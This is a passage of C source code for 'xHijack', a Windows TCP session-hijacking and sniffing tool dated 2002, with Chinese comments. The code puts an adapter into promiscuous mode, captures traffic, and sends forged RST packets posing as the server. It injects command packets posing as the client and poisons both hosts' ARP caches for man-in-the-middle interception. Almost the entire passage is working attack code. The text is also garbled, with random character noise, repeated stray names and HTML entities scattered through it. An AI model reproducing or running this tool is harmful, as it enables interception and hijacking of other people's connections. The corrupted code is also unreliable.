&AdapterLength) == FALSE) 9 A4 K$ ?- [0 H+ I+ y+ B9 K z { 0 U6 ?: t8 D. b printf("Unable to retrieve the list of the adapters!\n"); return 0; # k, x$ j# j" i% e; G } temp = temp1 = AdapterName; i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) { if (*temp == '\0') # d4 `& C+ B0 }/ s7 M: _ { memcpy(AdapterList,temp1,(temp-temp1)*2); printf("%d - %S\n", i+1, AdapterList); temp1=temp+1; 6 K/ Y7 L) \4 Q$ g$ e8 p. o i++; } 2 _8 D8 G' u/ o& v! ~ temp++; D6 k. I( P& W% c1 h } 5 t V2 i& j# x //choose adapter % z5 U/ @4 B9 k9 h" F while((iAdapter <= 0) || (iAdapter > i)) 6 c2 \, K2 N, ?8 U: }6 j' p5 b { printf("\nPlease choose your Adapter:"); scanf("%1d", &iAdapter); } + `- |( E6 G- K" F: R/ o printf("\n"); //---------------------------------------------// //这里调用iphlpapi来取得本地ip_addr和mac_addr sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); 7 i W$ G0 V3 ?7 D" |2 {3 n dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_BUFFER_OVERFLOW) 0 o3 r) t; F* A7 s* V0 U { printf("GetAdapterInfo error:%d\n", GetLastError()); ) p3 Z6 u) F4 @( b; |: B& i7 k return 0; 9 [/ S: `2 X U1 [4 { } " U) ?3 T, l% [& h% O C pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); if(!pAdapterInfo) { 1 D8 }/ w4 R3 R2 y, d printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); 5 g! L5 _; ^0 z, d+ B+ M& w0 p* k9 y return 0; } - E1 |+ \9 {5 m+ m6 i3 ]# L! o/ g dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) { printf("GetAdapterInfo error:%d\n", GetLastError()); % Z- C2 Q' ?' P" `; S return 0; } pTmp = pAdapterInfo; 5 W, l% E' }3 ^/ A1 |$ a- j# k7 } while(pTmp) { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) 8 u- `: ?8 c: z+ M { 3 b7 x1 s9 O8 G% l0 V4 a( b //found it,get own adapter mac address memcpy(g_szOwnMAC, pTmp->Address, 6); % g- @; ^7 A" I1 w9 X4 p //get ip address + V: r# R% ~- u' Z: [- k pIPAddr = &pTmp->IpAddressList; while(pIPAddr) { g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; - ^ ^5 P1 |( l f W, N if(g_TotalIP >= Max_Num_IPAddr) break; } / Y" a. ~6 f* K$ x9 {& k break; } q5 T- S2 C! A8 p/ s pTmp = pTmp->Next; } , M7 ]; i2 z/ l free(pAdapterInfo); - _7 I ^' X! U* X //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; //---------------------------------------------// //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { 6 |4 A! R8 J. x: O! _ iRetCode = GetLastError(); / v2 g% u; ?3 w printf("Unable to open the driver, Error Code : %lx\n", iRetCode); - {& ` o3 T" i return 0; } // set the network adapter in promiscuous mod ) z: D9 f. q$ u% Y* \5 D$ T if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) : W9 c! D5 Q, _% \! G2 ~' s* t { 6 i4 n$ C- k0 H6 {; d printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); 8 j4 }; a: F* y if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) * O& @7 D# p& S1 L8 ~! s* | { 3 ~$ H: h( P$ a2 i) t. ~; L printf("Unable to set ALL_LOCAL mode!\n"); . p$ ?$ S. @) [. K i2 p- ] return 0; } } 4 r8 {, Y' c) }3 ^: p$ \ // set a 512K buffer in the driver : Y. n) [0 y6 y# U" B- b if(PacketSetBuff(lpAdapter, 512000) == FALSE) ' h, b$ d" I) C/ d# y- M { & b& M0 e/ O, a3 e printf("Unable to set the kernel buffer!\n"); return 0; } // set a 1 second read timeout if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); 7 e% A9 Y. O7 ^ //设置发送的packet 2 I) k7 a. j4 t g* ` g_lpSendPacket = PacketAllocatePacket(); * {6 i6 u% W% M% ^ if(g_lpSendPacket == NULL) { printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; } 1 f* A+ ]) I; n7 K+ M5 q ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); , X! L% Z; C- Y9 r/ r# u PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } ( h9 f# ^; f2 l, n& @+ A//功能：帮助信息 ) W- G* b8 |' m0 Z* `void usage() { 3 V2 t1 D+ I) t2 f printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" ' c/ w- t) Y2 n( s3 S "By eyas 2002/8/19\n" 2 F2 O' G# E& n' Z; D "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); } // //功能：显示数据包的一些详细信息 // ' n0 p# M5 g" w' g( vVOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) # \+ {/ I6 R4 q8 J3 C{ ' C7 ?5 p1 p9 ^- t0 K SOCKADDR_IN saDest, saSrc; . ^4 S& `* B7 p+ f: J unsigned char FlagMask; int i; 7 M5 ]- i. E: h3 I7 @ + H- f" \- b5 G% n$ w( h saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; : _# n+ {* T( g* a' {: L4 U' Z& _ printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); $ ^2 ~9 d' y* {# ~ [) i. v //display TCP flag for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) { if((pTCPPacket->tcphdr.th_flag) & FlagMask) printf("%c", g_szTcpFlag); else printf("-"); : h" S8 F( R& d! L } printf("\n"); / Y- C# [4 ]3 E& _ //如有需要，可显示更多详细的信息 if(bDetail) ) F: P" ^/ ]: O) Z) B printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); 0 ]- |8 K$ c$ K5 b3 I- I} . c" U2 }0 W! z: d 0 n& `' N% a5 E' H- V// # i- c$ m% u4 e7 \7 o' j//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 // DWORD WINAPI AnalysePacketsThread(LPVOID lp) + R7 _/ P0 x) P{ 9 @( O6 ^0 k/ i/ N; ^# N! d ULONG ulBytesReceived; USHORT usDataLen; 9 `/ _ g% l7 N8 g# C* `: J //USHORT usIPHeadLen, usTCPHeadLen; char *buf; ' D$ `& F# c' w9 [, i u_int off, i; PTCPPACKET pTCPPacket; & Z) X3 g% Z1 v& }) g+ _$ E; _ struct bpf_hdr *hdr; % {" R7 z$ m7 S) s- J LPPACKET lpRecvPacket; char szPacketBuf[256000], *pStr; ; U, e" W5 G6 ?$ o BOOL bDeleteNode, bAddNew; : v! C# C% n) w$ d$ o DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 BOOL bClientToServer;//数据包是否从客户端发送到服务器端 //设置接收的packet lpRecvPacket = PacketAllocatePacket(); ; |: P7 w& ~$ _8 ~" Y& ?9 l if(lpRecvPacket == NULL) ! G; H, m% _$ X { printf("Error:failed to allocate the LPPACKET structure for recv.\n"); 5 D, w0 s( u# ^+ ]+ Z+ f return 0; } f8 T1 S* }* @8 ^, L2 ? ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); , s- B; t; b, i- K5 u PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); : V$ M. h5 x5 Z$ a9 N G8 { while(1) { % }- y2 S3 Q* y // capture the packets if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) { / |. F- T8 Z' [0 P/ P' I printf("Error: PacketReceivePacket failed.\n"); 9 ?% R n7 D3 p8 C: D break; 1 ~4 |# P- w* F' m$ c/ s. f7 J } ulBytesReceived = lpRecvPacket->ulBytesReceived; 0 ?3 L# j- h* g2 P# R buf = lpRecvPacket->Buffer; + v" _9 I/ ^0 E; I5 Y& ?5 f off = 0; while(off < ulBytesReceived) - b8 L% S' V; Q9 j4 O& n { 6 {: R- G3 _/ j3 L3 p$ | hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; & p2 ~* U; u8 S* J2 M* n pTCPPacket = (PTCPPACKET)(buf + off); + D( T- [% \; V& L off = Packet_WORDALIGN(off + hdr->bh_caplen); ; u5 |9 x( Z" t //不需要处理自己发出的包(转发或本机发送的) 8 o7 L( E* V* ^6 l2 h1 u2 ^ W if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 ( f1 S: v# ?0 |" J/ o. t; ^ if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; //也不处理DestIP是自己的包 " m. x4 K" B+ s" u7 ? for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
" H+ i$ a9 y( R3 ]- e& e8 D: v2 g  G            ResetActionAllFlag();
          }
          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
          {
8 x0 a2 ~  o+ a6 Z& m            //send rst packet to client
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
- s! N  c# _' j% s+ l8 z5 K            SendHiJackPacket(pTCPPacket);
            //reset action flag
9 E% K& }" [* ^8 s1 `, {" ?            ResetActionAllFlag();
* L6 L3 P! t1 a          }
& Z( ~/ T. \+ ~7 [1 {" e        }
        //show the tcp data
- w0 _. Y3 P9 X+ Z/ _+ s4 r% n        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
7 h" H' R1 e. s0 l. M* K          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
, o! C0 t% Q  c2 x      //debug output
; m* V2 e' f- S, `( {6 j( U2 o      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
/ o2 r* W" K- d* h, e. O  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
  return 0;
}

) Z: O+ k4 X, d+ ^; W: I
2 b0 |: x7 W% q' N  k- m//
2 u; v( s$ e2 N2 h- K$ m( X//功能：操作记录所有连接信息的单向链表
//
DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
0 O% t' T' C- M7 B            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
{
9 G6 h4 W2 [) `+ z  PCONNINFO  pNew, pTmp;
( R. u% D' y. @. u
% s: `1 {) X7 C3 D$ `' M  pTmp = g_pConnHead;
) X/ y. m8 ^9 C+ M( \7 X- O. y$ R/ |  while(pTmp)
" s3 K  V* S' ^: O  {
    if(pTmp-&gt;bActive)
    {
6 a" x4 r8 H* ]) [% k+ ?2 m& }2 q# y1 `      //found it
+ K) s9 W" o" i: j      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
" A) n6 q% l0 f7 r" `- k) h        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
4 ]3 k! U6 i+ D4 G        (pTmp-&gt;uClientPort == uClientPort) )
% X% K6 i9 j6 k; ~+ }      {
        if(bDelete)
% R/ z( _/ F; O* Z$ |: K        {
7 m% X$ [! P* ^& ?0 f          pTmp-&gt;bActive = FALSE;
          return 0;
  U3 ], }; P7 r. I0 G        }
        else return pTmp-&gt;ident;
# w4 y0 C4 W* W8 X, v+ E' B6 f      }
    }
. d1 w' r/ H: a, ^6 K+ G    pTmp = pTmp-&gt;Next;
! A8 v  M9 m  h  }
# p$ L# P( H5 n% M  //not found, create new node
% I& z' |0 X2 v! y  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
- o" ?2 n) p2 [* D  {
, j: Z( c% M& ~% Q    //search unactive note
8 x1 }5 V( S# s3 [3 l4 U/ A    pTmp = g_pConnHead;
" Z5 b6 ~4 T  E    while(pTmp)
    {
      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
1 O# D2 O5 B" |5 f: r* \  j& o    }
    //found a unactive node
, |, v' f+ {; l3 P. z- q    if(pTmp)
    {
      pTmp-&gt;dwServerIP = dwServerIP;
- z' z' [* k& ]6 z; x& ]      pTmp-&gt;uServerPort = uServerPort;
# n% n, Z! r% v" [. P      pTmp-&gt;dwClientIP = dwClientIP;
      pTmp-&gt;uClientPort = uClientPort;
: X1 I4 x. R! V      pTmp-&gt;bActive = TRUE;
" z1 L5 T0 _! X- s8 h$ ]5 M$ ]( H      return pTmp-&gt;ident;
    }
    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
' D: W, H/ P  j7 ~' ^/ U      printf("malloc for link node error:%d\n", GetLastError());
      return 0;
- u  W1 j) w4 f9 g- U- f    }
. L. B7 _: C8 f2 g    //fill the struct
: }  @1 W; G2 t( P0 Q! v2 g    pNew-&gt;bActive = TRUE;
    pNew-&gt;dwServerIP = dwServerIP;
    pNew-&gt;uServerPort = uServerPort;
    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
$ E, s2 p. F% m5 \6 H( p8 g    //add new node to link
    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
    else
& d3 ]8 M( ~" b7 D3 |    {
6 {8 n$ v8 o$ n  c$ Q% w      g_pConnLast-&gt;Next = pNew;
. y+ M! K* \) Y! A" p      g_pConnLast = pNew;
    }
    return pNew-&gt;ident;
  }
  return 0;
}
' C( d0 z$ R9 }/ w: l. P  j
//
3 [2 _, n5 }, p//功能：判断一个数据包是不是只有ACK标志
( w! c% u2 }8 _' C# c//
BOOL IsACKPacket(unsigned char flag)
{
8 {' w9 N+ a  o  int  i, j=1;
6 G* f/ H. P2 Z1 G( x5 L% t& w  for(i=0 ; i&lt;4; i++)
7 H% B# E4 p, q: G+ F" C  {
    if(flag &amp; j) return FALSE;
    j &lt;&lt;= 1;
  }
: c7 W8 v, d; G  if(!(flag &amp; 0x10)) return FALSE;//is ack?
  r2 f& o6 r- I7 M+ J. @! m  if(flag &amp; 0x20) return FALSE;
; |2 T; {: C: M( }% C9 V  u0 M  return TRUE;
3 ~3 ^, V4 f: s" z7 I}
, N0 u4 R& }; w% t7 R. M( S
//
//功能：伪装成Client给Server发送数据包
//
BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
; n) l1 w1 `9 O5 y- M{
2 D" y# ]# S  C& k& D2 C  ^3 H
4 k! n1 o/ x+ t0 C( q; x8 I7 a  char    szBuff[1520];
& q/ |# w6 Z3 R: t1 u  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;
8 p: x/ M) F4 N5 L3 e) V$ n
  __try
+ Z# S. _5 e$ P6 q0 r7 S  {
& c& ~2 [. ?2 _    //
% v* N9 z1 [: A    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for hijack packet
- n% u& j5 P% t! i7 ]    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
1 x$ m/ n$ z; k9 P    if(!pHiJackPacket)
    {
      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
  E, s& K4 E- \, b1 W    //-------------- modify the packet ---------------//
% M* w6 }+ f. h' r! ?& q! M    //modify ethernet head
; S( W( r9 \" \, _. B3 t    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    //modify ip head
1 R) Y" ^0 W0 n5 d, ~! Y    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
# M, K! Q2 T$ ^2 A    pHiJackPacket-&gt;iphdr.checksum = 0;
; u6 B+ S$ O5 k; |- w    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
    //modify tcp head
    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
/ V$ s! o; Y: g( A6 Z, v    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
( ^/ {! H$ G# I* Z( t    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
3 P! i5 M# G0 u: r    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
, _' |  t$ L7 f    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
# z# D  W: S2 c3 C8 C8 x- E    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
9 z) R5 T2 t* J    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
    //calculate IP checksum
( J9 |& F4 \! D    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
7 s6 }$ H' A* H( y' Z    //fill send buffer           
8 i/ @, ?6 T! ]    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
& U# B' O8 c6 B7 A- z+ @, \, j    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
8 x8 p9 w! l: @    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
4 o5 Z7 o3 q: r6 w/ k% {! S    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
' C: S5 [7 E( {8 x& |, l4 Y" L    {
5 _$ W" V& \( x( d! q1 {3 |      printf("Error sending the hijack packets!\n");
      __leave;
    }
    else printf("Send hijack packet ok!\n");
$ I" F. w& e. h; m    bRet = TRUE;
% [' t) o+ s+ |! Z$ \  Z( z1 a  }

韩冰

__finally
  {
% t1 f5 U/ b, `    if(pHiJackPacket) free(pHiJackPacket);
  }
& [1 g* q: W6 K) o) g  return bRet;
}


//
//功能：伪装成Server给Client发送rst包
//
: C. C3 ~3 M" MBOOL SendRstPacket(unsigned int seq, unsigned int ack)
% J" y9 N9 k- L& ?{
  char    szBuff[60];
  PSDHDR    psdhdr;
, I$ M1 N  }# f/ T# {* J+ ~- _  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

  __try
) `: j' S& a- ?( X  {
) C- X4 w, J2 M5 Z( C% Z  i    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
) }9 x: @+ J6 S& c' |    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
% F% O) l7 h6 U6 X- U1 u+ R    {
      printf("malloc error:%d\n", GetLastError());
9 u; O0 h2 X5 u3 m# F$ @( S& q( b5 x      __leave;
    }
2 m% D) k; P4 Y# m9 F) ]  _% c    //fill ethernet head
1 _0 z2 l( p0 n& Y$ R. {    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
( A. E) f4 n' t% X+ W1 T    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
! j1 N! {# r' D& h    //fil ip head
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
" f! T  q- y+ c6 e- O" l    pTcpPacket-&gt;iphdr.ident = 1;
$ U  A( K3 |9 j6 p    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
! {! E4 h8 y% P9 m$ o' m& K- A7 U5 m    pTcpPacket-&gt;iphdr.ttl = 128;
5 |# u! A8 e5 \# k) U% U6 A( I- l    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
3 v2 d' S+ @8 q& ~- X: D3 S    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
3 p: f9 A1 X0 L! N    //fill tcp head
( k1 m2 o  ?4 u2 n& j1 L! j* k$ Z    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
* ?/ Y0 E, C' }8 q* o    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
3 O. n6 D7 ?0 l4 m    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
0 ~) W+ k- [+ w& I- }, e. D3 C& b1 B    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
    pTcpPacket-&gt;tcphdr.th_win = 0;
8 V: t: [. z# j- n1 t    pTcpPacket-&gt;tcphdr.th_urp = 0;
, Y. g) p) P9 Y* T$ B    pTcpPacket-&gt;tcphdr.th_sum = 0;
7 }' [+ C% c4 i; j+ o$ m1 Y    //fill tcp psd head
    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
1 B: X) j% _/ P; F, r    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
" Z8 `0 c* c. a! J4 w" M  e    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
  T( x! {9 F$ U- f6 c) n4 K: C    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
# _, s8 c* \3 p8 k    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
  M' f3 t5 y8 C/ h    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
    //calculate IP checksum
$ k! i5 x9 Y9 ^    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
6 l6 n" `) q# L9 d$ N& x! F    //fill send buffer
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
* m3 K2 p! ?  p4 v8 Z0 z0 k6 k. ]    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
; l4 G6 e) W3 F  O+ D    {
      printf("Error sending the rst packets!\n");
! |7 ^" D/ Z, Q- O. A      __leave;
    }
8 x# l# M( {. v- x    else printf("Send RST packet ok!\n");
    bRet = TRUE;
. ~0 ~& A5 k9 U2 n, L2 ^  }
  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
; O: J3 Z, S* |0 j( J  }
  return bRet;
}
. \& ~0 w6 j5 `: L7 Q0 m. ^
//
//功能：计算校验和
//
1 `& A1 z2 {2 m( m8 n7 B  T( fUSHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
) [3 L7 J+ \" U& L" Y# E$ O while(size &gt;1) {
' I! r0 H7 u& \% D  cksum+=*buffer++;
  size -=sizeof(USHORT);
0 J0 B, m- K  }5 C2 Z }
if(size ) {
, W7 I( X6 ?( F& ~, j# E7 I  cksum += *(UCHAR*)buffer;
+ P1 D3 m4 Y. @7 U2 o }
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
2 ~2 R+ [! e7 Y0 `. _5 z5 I5 D+ Z cksum += (cksum &gt;&gt;16);
# d" d9 v) F% m$ a- `) ? return (USHORT)(~cksum);
9 O  F. d( U' h. E+ k5 o' _}

! ]4 X  z, d6 U' i# Y" o7 B" y9 ~+ m//
7 D1 z% G! A; o//功能:实施ARP欺骗
2 F' O1 {9 Z; I2 o; q//1 告诉ServerSide,ClientSide的mac是ownmac
//2 告诉ClientSide,ServerSide的mac是ownmac
7 g. W: g* l7 s+ u2 h4 v. f4 A//
DWORD WINAPI ArpSpoofThread(LPVOID lpType)
; u: O, }0 _2 C{
  s1 k- T9 J0 e7 l  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
+ k, ]( B3 s  f& ^! P3 ~( V  char    szArpBuff[60];
; b$ S0 q3 H. u* e( t* N9 {
. J" L0 }5 z5 a# Y  switch(iType)
  {
    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ServerSideIP;
' X# a4 `3 F2 Y8 Z* M% j      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
, u  W! U3 ^/ d* V  Q- |# c      break;
    case 2:
( y/ Z. B1 J& [2 u* }      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
+ N, [( ?/ A4 r  H      ArpPacket.arphdr.DestIP = g_ClientSideIP;
& K- ]' X* H) I, t% E7 u3 g      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
) a* S& C/ k; A( S( u; z- P+ @. V7 h      break;
4 X+ }4 X: S. B  m: c" ]# {    default:
$ F0 N! z4 H4 t. M% b: R5 M      return 0;
  }
0 r. p6 p6 L7 s+ ?' H$ U  //ethernet head
  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
' l2 P% A1 D3 u/ U+ F  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
+ U$ C* [1 m: E# A' i# ^( H  //arp head
2 |1 f* Y5 X6 p) C  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
1 C5 D, W0 P- L2 G+ v5 ?2 X  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
. e# T: u( ?" c$ q  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
4 N, S1 c0 u' }. q  ArpPacket.arphdr.ProType = htons(EPT_IP);
. P1 ], G2 f. q" s1 m) k  ArpPacket.arphdr.op = htons(2);//arp reply

- W/ Q1 R. n: o2 t; U1 U# S  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
. b" I# u* X8 D7 C+ [4 Q- E3 W+ f/ R  {
" W& k" S: F" A$ ]    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
7 Z7 s* J! ], ]    return 0;
; m. y) H  e% ^- h  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
! `- h0 d. @4 }  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
9 B. }: U( S, ?' K  while(1)
. W  D8 Z5 R  T$ _8 W  {
